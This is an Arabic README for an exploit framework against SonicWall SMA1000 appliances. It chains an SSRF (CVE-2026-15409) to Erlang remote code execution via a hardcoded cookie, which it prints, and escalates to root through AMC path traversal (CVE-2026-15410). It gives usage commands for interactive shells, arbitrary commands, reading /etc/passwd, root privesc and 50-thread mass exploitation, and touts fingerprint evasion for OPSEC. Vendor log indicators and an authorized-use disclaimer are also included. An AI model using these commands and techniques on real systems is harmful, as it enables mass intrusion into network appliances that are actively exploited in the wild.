
إطار عمل متعدد الاستغلالات لـ SonicWall SMA1000 يربط ثغرة SSRF (CVE-2026-15409) للوصول إلى RCE في Erlang ورفع الصلاحيات إلى الجذر (CVE-2026-15410). يتضمن قشرة تفاعلية، وفحصًا جماعيًا، وعمليات على الملفات، ووضع كشف آمن لاختبار الاختراق المصرح به.

إطار استغلال وأداة كشف آمنة
للاستخدام في الاختبارات الأمنية المصرّح بها فقط.
تُقدَّم هذه الأداة لأغراض التعليم واختبارات الاختراق المصرّح بها فقط.
المؤلفون والمساهمون غير مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج. يتحمل المستخدمون وحدهم مسؤولية التأكد من حصولهم على إذن كتابي صريح من مالك الهدف قبل الاختبار. الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني بموجب قانون الاحتيال وإساءة استخدام الحاسوب (CFAA) والقوانين المماثلة حول العالم.
باستخدامك لهذا البرنامج، فإنك توافق على:
⚠️ تحذير: هذه الثغرة تُستغل بنشاط في البرية. قد يؤدي الاستخدام غير المصرح به إلى عواقب قانونية وخيمة.
CVE-2026-15409 هي ثغرة حرجة من نوع تزوير الطلبات من جانب الخادم (SSRF) بدون مصادقة، تم اكتشافها في واجهة Work Place لجهاز SonicWall SMA1000.
كيف تعمل:
wsproxy.os:cmd/1.حقائق رئيسية:
exploit.py)الاستغلال الكامل والمُسلّح يربط بين CVE-2026-15409 وCVE-2026-15410 لتحقيق اختراق على مستوى الجذر.
pip (لمكتبة requests)pip install -r requirements.txt
# Interactive shell on target
python exploit.py -u 192.168.1.100
# Execute a single command
python exploit.py -u 192.168.1.100 --exec "id && whoami"
# Read a file
python exploit.py -u 192.168.1.100 --read-file /etc/passwd
# Enable SSRF detection before exploitation
python exploit.py -u 192.168.1.100 --detect
# Attempt root privesc
python exploit.py -u 192.168.1.100 --privesc
# Mass exploit from file (50 threads)
python exploit.py -l targets.txt -m 50 --exec "uname -a"
# Custom port and path
python exploit.py -u 10.0.0.5 -p 8443 --path /workplace
# Pipe mode (read command from stdin)
echo "cat /etc/hosts" | python exploit.py -u 192.168.1.100
# Single target scan
python checker.py https://192.168.1.100
# Custom port and path
python checker.py 192.168.1.100 --port 8443 --path /workplace
# Mass scan from file
python checker.py --list targets.txt
⚠️ مهم: لا تؤثر هذه الثغرات على جدران الحماية من SonicWall (SSL-VPN) أو سلسلة SMA 100.
تقبل نقطة نهاية wsproxy على المنفذ 443 معامل bmID يبدأ بـ -3389 ومواصفات host:port. من خلال توجيه host=127.0.0.1 وport=1050، يمكن للمهاجمين إنشاء نفق إلى خدمة توزيع Erlang الداخلية.
تستخدم عقدة Erlang ملف تعريف ارتباط (cookie) افتراضيًا مضمّنًا في الكود: 10ecad5b446e86864832904cd439b6b70262. وهذا يسمح بالمصادقة عن بُعد وتنفيذ أي استدعاء os:cmd/1.
بمجرد المصادقة، يكتب الاستغلال سكربت شل إلى /var/tmp/ ويستدعي نقطة نهاية AMC remove_hotfix الخاصة بـ XML-RPC مع اجتياز المسار (../../../../var/tmp/script.sh)، مما ينفذ السكربت بصلاحيات الجذر.
توصي SonicWall بالتحقق من:
extraweb_access.log بحثًا عن /__api__/login أو /__api__/logout (حالة 200)extraweb_access.log بحثًا عن /wsproxy مع معاملات host مشبوهة (حالة 101)ctrl-service.log بحثًا عن عمليات تراجع (rollback) للإصلاحات السريعة (hotfix) مع اجتياز المسار/var/lib/unit/conf.json الذي يحتوي على مسارات لـ /__api__/login أو /__api__/logout| الميزة | الوصف |
|---|
| 🚀 SSRF → Erlang RPC | ينشئ نفقًا تلقائيًا عبر wsproxy للوصول إلى عقد Erlang الداخلية. |
| 💻 تنفيذ التعليمات البرمجية عن بُعد | تنفيذ أوامر نظام تشغيل عشوائية عبر os:cmd/1. |
| 🔐 صدفة تفاعلية | إنشاء صدفة حية مع دعم لأوامر privesc وdownload. |
| 👑 رفع صلاحيات إلى الجذر | استغلال CVE-2026-15410 لرفع الصلاحيات إلى الجذر باستخدام اجتياز المسار في AMC. |
| 📁 عمليات الملفات | قراءة وكتابة الملفات على النظام المستهدف. |
| 🌐 فحص جماعي | استغلال أهداف متعددة بشكل واسع مع خاصية الخيوط (علم -l). |
| 🎯 كشف SSRF | علم اختياري --detect للتحقق الآمن من الثغرة. |
| ⚙️ قابل للتخصيص | تجاوز عنوان WebSocket URL وOrigin وUser-Agent وCookie والمزيد. |
| 🧩 بدون تبعيات إضافية | يستخدم مكتبة Python القياسية فقط (باستثناء requests الاختيارية للكشف). |
| 🔌 تنفيذ WebSocket خام | لا مكتبات WebSocket خارجية — مصافحة مخصصة على مستوى المقبس (socket) تتجنب بصمات التوقيع الخاصة بالمكتبات لتحسين OPSEC. |
| المنتج | الإصدارات المتأثرة | الإصدارات المُصلحة |
|---|
| SMA 6210 | 12.4.3-03245, 12.4.3-03387, 12.4.3-03434 12.5.0-02283, 12.5.0-02624, 12.5.0-02800 | 12.4.3-03453+ 12.5.0-02835+ |
| SMA 7210 | نفس ما سبق | نفس ما سبق |
| SMA 8200v | نفس ما سبق | نفس ما سبق |